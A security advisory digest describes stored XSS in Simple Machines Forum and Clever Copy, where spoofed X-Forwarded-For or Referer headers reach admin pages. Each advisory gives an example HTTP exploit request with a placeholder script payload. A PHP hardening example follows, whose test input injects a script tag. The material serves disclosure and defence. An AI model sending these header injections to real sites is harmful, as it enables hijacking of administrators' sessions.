Recent X-Forwarded-For XSS vulnerabilities
Here is a short summary of recent X-Forwarded-For XSS vulnerabilities discovered by the eVuln team. The full list with details is available on the eVuln Security Advisories page.
X-Forwarded-For XSS in Simple Machines Forum - SMF.
Description.
Vulnerable script: Sources/Register.php
The variable $_SERVER['HTTP_X_FORWARDED_FOR'] is not properly sanitized. An attacker can send an HTTP request with a fake X-Forwarded-For value containing arbitrary HTML or script code. That code is executed when the administrator opens the "View all members" section of the administrator's control panel.
The administrator's session is therefore at risk.
Exploit.
Example of HTTP POST Query:
POST /smf/index.php?PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
Host: [host]
X-Forwarded-For: anyIP[XSS]
Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
Content-Length: 81

user=m&email=m@m.com&passwrd1=m&passwrd2=m&regagree=1&regSubmit=Register
Solution.
Solution is not available.
Clever Copy Referer and X-Forwarded-For XSS.
Description.
Vulnerable script: stats/script.php
The variables $_SERVER['HTTP_REFERER'] and $_SERVER['HTTP_X_FORWARDED_FOR'] are not properly sanitized. An attacker can send an HTTP request with a fake Referer or X-Forwarded-For value containing arbitrary HTML or script code. That code is executed when the administrator opens Site Stats.
The administrator's session is therefore at risk.
Exploit.
Example of HTTP Query:
GET /path//stats/script.php?image=1&javascript=false HTTP/1.0
Host: host
Referer: http://path/index.php<XSS>
X-Forwarded-For: anyIP<XSS>
Solution.
Solution is not available.
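Both advisories above share one root cause: a request header is stored and later echoed into an administrator page without validation or output encoding. As an added hardening example (not code from SMF, Clever Copy or eVuln), the PHP below accepts X-Forwarded-For only from a trusted proxy and only when it parses as an IP address, and HTML-escapes header values such as Referer before they are rendered; the proxy addresses and request values are constructed for illustration.

```php
<?php
// Added hardening example for the two advisories above; it is not code from
// SMF, Clever Copy or eVuln. Both bugs share one cause: a request header is
// stored and later echoed into an admin page without validation or escaping.

// Choose the client IP to record. X-Forwarded-For is honoured only when the
// request came from a configured trusted proxy and its leftmost entry is a
// syntactically valid IP; otherwise fall back to REMOTE_ADDR, which the web
// server sets from the TCP connection itself.
function client_ip(array $server, array $trusted_proxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    $xff    = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '' || !in_array($remote, $trusted_proxies, true)) {
        return $remote;
    }
    // X-Forwarded-For is a comma-separated chain; the leftmost is the client.
    $first = trim(explode(',', $xff)[0]);
    return filter_var($first, FILTER_VALIDATE_IP) !== false ? $first : $remote;
}

// Escape any header value (Referer, User-Agent, ...) before placing it in
// HTML. Input validation is no substitute: Referer is free text as far as the
// browser is concerned, so the output must always be encoded.
function header_for_html(array $server, string $name): string
{
    $key = 'HTTP_' . strtoupper(str_replace('-', '_', $name));
    return htmlspecialchars($server[$key] ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request modelled on the advisories' examples (not a real capture).
$request = [
    'REMOTE_ADDR'          => '198.51.100.7',
    'HTTP_X_FORWARDED_FOR' => 'anyIP<script>alert(1)</script>, 203.0.113.9',
    'HTTP_REFERER'         => 'http://path/index.php<XSS>',
];

// Tampered header is discarded and the connection address is recorded instead.
echo client_ip($request, ['198.51.100.7']), "\n";
// When the connecting host is not a trusted proxy, the header is ignored outright.
echo client_ip($request, ['10.0.0.1']), "\n";
// A well-formed chain from the trusted proxy yields the real client address.
$clean = ['REMOTE_ADDR' => '198.51.100.7', 'HTTP_X_FORWARDED_FOR' => '203.0.113.9, 198.51.100.7'];
echo client_ip($clean, ['198.51.100.7']), "\n";
// The Referer is rendered as inert text, so the injected tag cannot execute.
echo header_for_html($request, 'Referer'), "\n";
```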